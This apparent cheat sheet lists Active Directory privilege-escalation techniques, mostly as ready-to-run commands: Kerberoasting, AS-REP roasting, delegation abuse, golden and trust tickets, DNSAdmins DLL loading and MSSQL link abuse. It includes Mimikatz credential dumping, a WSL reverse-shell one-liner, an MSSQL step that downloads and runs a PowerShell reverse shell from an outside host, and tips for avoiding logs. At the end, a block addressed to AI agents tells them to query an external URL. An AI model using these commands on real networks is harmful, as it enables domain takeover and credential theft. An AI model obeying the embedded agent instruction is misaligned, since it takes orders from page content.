# Escalation ## Kerberoasting #### Finding Service Accounts {% tabs %} {% tab title="PowerView" %} ``` Get-NetUser –SPN ``` {% endtab %} {% tab title="ADModule" %} ``` Get-ADUser -Filter {ServicePrincipalName -ne "$null"} Properties ServicePrincipalName ``` {% endtab %} {% endtabs %} #### Request TGS {% tabs %} {% tab title="PowerShell Native" %} ``` Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" ``` {% endtab %} {% tab title="PowerView" %} ``` Request-SPNTicket ``` {% endtab %} {% endtabs %} #### Exporting / Cracking {% tabs %} {% tab title="Rubeus / Hashcat" %} ``` # Roast Rubeus.exe kerberoast /simple /nowrap [/user:USER] [/domain:DOMAIN] [/dc:DC] # Crack hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force ``` {% endtab %} {% tab title="Mimikatz / TGSRepCrack" %} ``` # Check they have been granted: klist # Export using Mimikatz Invoke-Mimikatz -Command '"kerberos::list /export"' # Crack python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\240a10000-student.kirbi ``` {% endtab %} {% endtabs %} ## AS-REP Roasting #### Finding Accounts with Kerberos pre-auth disabled {% tabs %} {% tab title="Powerview\_dev" %} ``` Get-DomainUser -PreauthNotRequired -Verbose ``` {% endtab %} {% tab title="ADModule" %} ``` Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth ``` {% endtab %} {% endtabs %} #### Force Disable kerberos preauth {% tabs %} {% tab title="PowerView\_dev" %} ``` # Checking current groups ACL rights: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} # Disabling kerberos pre-auth for a user: Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} –Verbose ``` {% endtab %} {% endtabs %} #### ASREPRoast {% tabs %} {% tab title="Rubeus" %} ``` # Get the hashes of all Rubeus.exe asreproast /format:hashcat /nowrap [/user:USER] [/outfile:FILEPATH] # Crack with hashcat hashcat asreproast.txt -m 18200 /usr/share/wordlists/rockyou.txt --force ``` {% endtab %} {% tab title="Invoke-ASREPRoast" %} ``` # Use ASREPRoast: Get-ASREPHash -UserName VPN1user -Verbose # Do all automatically: Invoke-ASREPRoast -Verbose # Crack using John ./john vpn1user.txt --wordlist=wordlist.txt ``` {% endtab %} {% endtabs %} ## SetSPN - Targeted Kerberoasting #### Enumeration {% tabs %} {% tab title="PowerView\_dev" %} ``` # Viewing our ACL permissions: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} # Check if user has SPN: Get-DomainUser -Identity supportuser | select serviceprincipalname ``` {% endtab %} {% tab title="ADModule" %} ``` # Check if user has SPN already: Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName ``` {% endtab %} {% endtabs %} #### Setting SPN (must be unique for domain) {% tabs %} {% tab title="PowerView / SharpView" %} ``` Set-DomainObject -Identity USER -SET @{serviceprincipalname='ops/whatever1'} ## Clean up Set-DomainObject -Identity USER -clear serviceprincipalname ``` {% endtab %} {% tab title="ADModule" %} ``` Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'} ``` {% endtab %} {% endtabs %} Extraction and cracking same as kerberoasting. ## Unconstrained Delegation #### Enumeration {% tabs %} {% tab title="PowerView" %} ``` Get-NetComputer -UnConstrained ``` {% endtab %} {% tab title="ADModule" %} ``` Get-ADComputer -Filter {TrustedForDelegation -eq $True} Get-ADUser -Filter {TrustedForDelegation -eq $True} ``` {% endtab %} {% endtabs %} #### Compromise server then wait, or use printer bug with Rubeus Listening ``` # Printer bug https://github.com/leechristensen/SpoolSample # Listen with Rubeus .\Rubeus.exe monitor /interval:5 # Use printer bug .\SpoolSample_v4.5_x64..exe TARGET CAPTURE # Use ticket Rubeus.exe ptt /ticket: ``` #### Export tickets and steal DA {% tabs %} {% tab title="Rubeus" %} ``` # Look at tickets on system (run as system to see all) Rubeus.exe triage # Get ticket Rubeus.exe dump /luid:TICKETLUID /nowrap # Use ticket Rubeus.exe ptt [/ticket:BASE64TICKET] [/luid:LUID] ``` {% endtab %} {% tab title="MimiKatz" %} ``` # Export: Invoke-Mimikatz –Command '"sekurlsa::tickets /export"' # PTT: Invoke-Mimikatz -Command '"kerberos::ptt C:\Documents\user1\[0;2ceb8b3]-2.kirbi"' ``` {% endtab %} {% endtabs %} ## Constrained Delegation #### Enumeration {% tabs %} {% tab title="PowerView\_dev" %} ``` # Which User/Comp Get-DomainUser –TrustedToAuth Get-DomainComputer –TrustedToAuth # What can the found users/comps do Get-DomainUser USER -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto Get-DomainComputer COMP -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto ``` {% endtab %} {% tab title="ADModule" %} ``` Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo ``` {% endtab %} {% endtabs %} #### Getting Ticket Need NTLM hash or clear creds for the user with constrained delegation {% tabs %} {% tab title="Rubeus" %} ``` ===DCSYNC=== # On comp with contrained delegation rights for time\dcorp-dc. # hash is of the machine account Rubeus.exe s4u /user:COMP$ /rc4:HASH /impersonateuser:Administrator /msdsspn:"time/DC.DOMAIN.LOCAL" /altservice:LDAP,cifs /ptt #DCsync dcsync DOMAIN DOMAIN\krbtgt ===FILESHARE=== # On user with constrained delegation rights for CIFS\COMP # Hash is of the user with delegation rights Rubeus.exe s4u /user:USER /rc4:HASH /impersonateuser:Administrator /msdsspn:"CIFS/COMP" /ptt # Check Access ls \\COMP\c$\ ``` {% endtab %} {% tab title="Kekeo" %} ``` ===DCSYNC=== ## Request TGT with Kekeo tgt::ask /user:COMP$ /domain:DOMAIN /rc4:HASH ## Request TGS with Kekeo tgs::s4u /tgt:TGT.kirbi /user:Administrator@DOMAIN /service:time/DC.DOMAIN.local|ldap/DC.DOMAIN.local ## Extract Ticket Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"' ## DCSync Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\krbtgt"' ===FILE SHARE=== ## Request TGT with Kekeo kekeo# tgt::ask /user:USER /domain:DOMAIN /rc4:HASH ## Next request TGS with kekeo (note cifs service id on end) tgs::s4u /tgt:TGT_.kirbi /user:Administrator@DOMAIN /service:cifs/COMP-FQDN ## Inject ticket with mimikatz Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"' ## Check it worked ls \\COMP-FQDN\c$ ``` {% endtab %} {% endtabs %} ## Resource Based Constrained Delegation #### Enumeration ``` # ACL can be found with BH or invoke-acl scanner / get-acl etc. # Need to control a machine with SPN or ability to add a domain machine (normal user) # Also need write permissoion on a computer object ``` #### Adding New Computer Object ``` Import-Module .\Powermad.psd1 New-MachineAccount -Domain offensiveps.powershell.local -DomainController 192.168.2.1 -MachineAccount AttackCompObj -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose ``` #### Set RBCD on target ``` # Import AD Module Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1 # Set RBCD on Target Set-ADComputer -PrincipalsAllowedToDelegateToAccount $ -Verbose ``` #### Control Target ``` # Create hash of plaintext password if creating a new machine .\Rubeus.exe hash /password: # Request TGS .\Rubeus.exe s4u /user:AttackCompObj$ /rc4:HASH /msdsspn:http/ /impersonateuser:Administrator /ptt # HTTP allows psremote Enter-pssession -computername ``` ## LAPS Abuse #### Enumeration {% tabs %} {% tab title="LAPS Module" %} ``` # Easiest done with the LAPS powershell module # Get OU with powerview Get-NetOU # Import module Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 # Find the OUs that can read LAPS passwords Find-AdmPwdExtendedRights -Identity ``` {% endtab %} {% tab title="PowerView" %} ``` # Basic but reliable Get-NetOU -FullData # Script to get in nice format (unreliable) Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ } ``` {% endtab %} {% endtabs %} #### Abuse {% tabs %} {% tab title="LAPS Module" %} ``` # Once we have compromised a user that sits within an OU that can read LAPS Get-AdmPwdPassword -ComputerName # After gaining password you can log in to machine as \Administrator # If we have SYSTEM on a LAPS machine, we can alter the password expiration time so we can persist longer on the machine. # If we have DA we can modify ACLs of computer objects to provide attackers with permissions to read passwords in clear. # Client component (C:\Program Files\LAPS\CSE\AdmPwd.dll) has no integrity check and can be replaced with malicious dll for attacks such as known password, long expiration time etc. ``` {% endtab %} {% tab title="PowerView" %} ``` # Once we have compromised user with privs: Get-ADObject -SamAccountName | select ExpandProperty ms-mcs-admpwd ``` {% endtab %} {% tab title="ADModule" %} ``` # Once we have compromised user with privs: Get-ADComputer -Identity -Properties msmcs-admpwd | select -ExpandProperty ms-mcs-admpwd ``` {% endtab %} {% endtabs %} ## Just Enough Administration (JEA) Abuse JEA allows non admin users to psremote using certain psremote configurations. These are restricted but can be in a configuration where you are running as an admin. This means if you break out of the confines of configuration then you are an admin of the box. #### Enumeration ``` AD descriptions. So far havent seen any official way to scan for them. # Role Capability file (Visible cmdlets etc) New-PSRoleCapabilityFile -Path .\JEA.psrc # Session configuration files (user mappings and role definitions) New-PSSessionConfigurationFile -SessionType RestrictedRemoteServer -Path .\JEA.pssc Register-PSSessionConfiguration -Path .\JEA.pssc -Name 'Persist' -Force # If you can find .pssc or .psrc files then they can help breakout. ``` #### Abuse ``` # Connect to JEA endpoint Enter-PSSession -ComputerName -ConfigurationName # Enum commands available, look them up in docs to see what is possible Get-Command # Some dangerous cmdlets start-process add-computer new-iissite set-pssessionconfiguration (set-pssessionconfiguration -Name -SecurityDescriptorSDDL )(https://gist.github.com/jborean93/6d9aaf868d1d40344188984ebb431b04) ``` ## PowerShell Web Access (PSWA) Abuse #### Enumeration ``` # PSWA can be used to get a powershell session on port 443. # Default path https://hostname/pswa # Requires admin creds, available cmdlets can be restricted Get-Command ``` #### Abuse ``` # Depends on config, but look for sensitive commands and binaries. Net.exe Reg.exe Invoke-Command Start-Process # If a breakout is needed refer to JEA as well. ``` #### Configure for Persistance ``` # Install Install-WindowsFeature -Name WindowsPowerShellWebAccess # Configure Install-PswaWebApplication -useTestCertificate # Configure Rules (Wildcard * can be used for all values allowing all users / cmds) Add-PswaAuthorizationRule -UserName -ComputerName -ConfigurationName ``` ## Windows Subsystem Linux (WSL) Abuse #### Enumeration ``` # Find linux distro on windows host, should see binaries and filesystem # Can access files like on linux /etc/shadow etc. # Worth looking for keytab files. These allow linux to talk kerberos and can be cracked. https://github.com/sosdave/KeyTabExtract python3 keytabextract.py /root/ADShare/wslhost.keytab ``` #### Abuse ``` # Run windows binaries with bash bash.exe -c cmd.exe # Run windows binaries with wsl wsl.exe cmd.exe # These run with permissions of WSL process, as current windows user. # Reverse Shell wsl.exe mknod /tmp/backpipe p && /bin/sh 0/tmp/backpipe # Can be useful for stealth since its harder to detect malicious activity on WSL. ELF persistance would be very good. ``` ## Windows Device Guard Bypass #### Enumeration ``` # With device guard you will be in a shell with no language mode and app whitelisting. # List policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` #### Bypass ``` # Known also as CLM bypasses, there are several online. # Typically windows signed binaries allowed, worth trying: Procdump.exe Psexec.exe Reg.exe # CLM Bypasses: ``` ## DNSAdmins #### Enumeration {% tabs %} {% tab title="PowerView" %} ``` Get-NetGroupMember -GroupName "DNSAdmins" ``` {% endtab %} {% tab title="ADModule" %} ``` Get-ADGroupMember -Identity DNSAdmins ``` {% endtab %} {% endtabs %} #### Abuse ``` Compromise DNSAdmin user is necessary to perform abuse # Configure DLL using dnscmd.exe: dnscmd DC /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll # Configure DLL using DNSServer module: $dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc Verbose -All $dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll" Set-DnsServerSetting -InputObject $dnsettings -ComputerName DC -Verbose # Restart DNS Service sc \\DC stop dns sc \\DC start dns # By default, the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log ``` ## Microsoft Exchange Abuse #### Enumeration ``` # Exchange groups have high permissions. Look for groups such as: Organization Management (Full control over exchange windows permissions group) Exchange Windows Permissions (WriteDACL on domain object pre server 2019) Exchange Trusted SubSystem (can modify DACL of DNSAdmins and others, local admin to exchange servers) ``` #### Abuse ``` # Own user in groups above or own exchange server # PTH as user or exchange server # Import ADModule and RACE Import-Module .\ADModulemaster\Microsoft.ActiveDirectory.Management.dll Import-Module .\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 . .\RACE.ps1 # Give user access to DC Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -Server techcorp.local -Verbose # Give DCSync Set-ADACL -SamAccountName DOMAIN\USER DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose # (As DA)Giving user WriteDACL over windows exhchange group for persistance Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -SAMAccountName DOMAIN\USER -Verbose # (As user now added) Use that priv to modify acl of windows permissions and give write member Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -GUIDRight WriteMember -Server techcorp.local -Verbose ``` ## Cross-Domain Trust Tickets #### Get Trust Key ``` # Mimikatz trust Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName DC # Mimikatz dcsync Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\TARGETDOMAIN$"' ``` #### Forging Inter-Realm TGT ``` Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3250652063-538504511 /sids:S-15-21-280534878-14999702234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.LOCAL /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' ``` | Command | Function | | ------------------------------------------------- | ------------------------------------------------------- | | Kerberos::golden | Mimikatz Module | | /domain:DOMAIN.LOCAL | FQDN of the current domain | | /sid:S-1-5-21-166606631-311152063-538504511 | SID of the current domain | | /sids:S-1-5-21-282224878-1496977734-700767426-519 | SID of the enterprise admins group of the parent domain | | /rc4:HASH | RC4 of the trust key | | /user:Administrator | User to impersonate | | /service:krbtgt | Target service in the parent domain | | /target:TARGETDOMAIN.LOCAL | FQDN of the parent domain | | /ticket:C:\AD\Tools\kekeo\trust\_tkt.kirbi | Path where ticket is to be saved | #### Get TGS for Service in target domain (CIFS below, but could be LDAP, HOST and HTTP) using trust ticket ``` .\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/DC.DOMAIN ``` #### Use TGS to access service in target (may need to use twice) ``` # Convert and use TGS .\kirbikator.exe lsa .\CIFS.DC.DOMAIN.kirbi # Access ls \\DC.DOMAIN\c$ ``` ## Cross-Domain using krbtgt Hash #### Create Ticket Abusing SID History ``` # Get krbtgt Invoke-Mimikatz -Command '"lsadump::lsa /patch"' # Create token Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:HASH /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"' ``` In the above command, the mimkatz option "/sids" is forcefully setting the SID History for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group. #### Use Ticket ``` # PTT Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' # Access ls \\DC.DOMAIN.local\c$ gwmi -class win32_operatingsystem -ComputerName dc.DOMAIN.local ``` #### Avoiding suspicious logs ``` Invoke-Mimikatz -Command '"kerberos::golden /user:dc$ /domain:DOMAIN.local /sid:S-1-5-211874506631-3219952063-538504511 /groups:516 /sids:S-1-521-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:HASH /ptt"' # S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers # S-1-5-9 – Enterprise Domain Controllers # Looks like DCs talking between each other and still grants us a ticket for the enterprise DCs. ``` ## Cross-Forest Trust Tickets #### Get Trust Key ``` # Mimikatz trust Invoke-Mimikatz -Command '"lsadump::trust /patch"' # Mimikatz dump Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ``` #### Creating inter-forest TGT ``` Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"' ``` #### Using inter-forest ticket to request TGS ``` .\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/TARGET-dc.DOMAIN.local ``` #### Use TGS ``` # Use TGS to access service .\kirbikator.exe lsa .\CIFS.TARGET-dc.DOMAIN.local.kirbi # Found file share: Invoke-ShareFinder -Domain DOMAIN.local # Check Access ls \\TARGET-dc.DOMAIN.local\SharedwithDCorp\ ``` ## MSSQL Trust Abuse PowerUpSQL: #### Finding MSSQL Instances ``` # Discovery (SPN Scanning): Get-SQLInstanceDomain # Check Accessibility: Get-SQLConnectionTestThreaded # Use together: Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose # Gather Information: Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose ``` #### Enumerating Database Links {% tabs %} {% tab title="PowerUpSQL" %} ``` # Look for links to remote servers Get-SQLServerLink -Instance instance-mssql -Verbose # Enumerating nested database links Get-SQLServerLinkCrawl -Instance instance-mssql -Verbose ``` {% endtab %} {% tab title="Manual SQL" %} ``` # look for links to remote servers select * from openquery("INSTANCE",'select * from master..sysservers') # Enumerating nested database links select * from openquery("INSTANCE",'select * from openquery("dcorpmgmt",''select * from master..sysservers'')') ``` {% endtab %} {% endtabs %} #### Enabling xp\_cmdshell if rpcout is enabled (disabled by default) ``` EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "INSTANCE" ``` #### Executing Commands {% tabs %} {% tab title="PowerUpSQL" %} ``` # Executes command over link Get-SQLServerLinkCrawl -Instance INSTANCE -Query "exec master..xp_cmdshell 'whoami'" # shell Get-SQLServerLinkCrawl -Instance INSTANCE -Query "powershell.exe iex (iwr http://192.168.50.51/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.50.51 -Port 443" ``` {% endtab %} {% tab title="Manual SQL" %} ``` # Executes command over nested links select * from openquery("dcorp-sql1",'select * from openquery("dcorpmgmt",''select * from openquery("eu-sql",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')') ``` {% endtab %} {% endtabs %} ## PAM Trust PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. Temporary Group Membership also introduced so perms only given for set time. #### Enumeration ``` # Import ADModule # Detect if current forest is PAM trust Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} # Enumerate Shadow Principals Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl # Enumerate if current forest is managed by a bastion forest Get-ADTrust -Filter {(ForestTransitive -eq $True)} # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External = PAM ``` #### Abuse ``` # Find users with shadow principals and names of shadow principal objects Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl # Add a compromised user to the group Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=gcbsec,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=gcbsec,DC=local"} # Once compromised you can manage forests with EA permissions. ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cheats.philkeeble.com/active-directory/ad-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.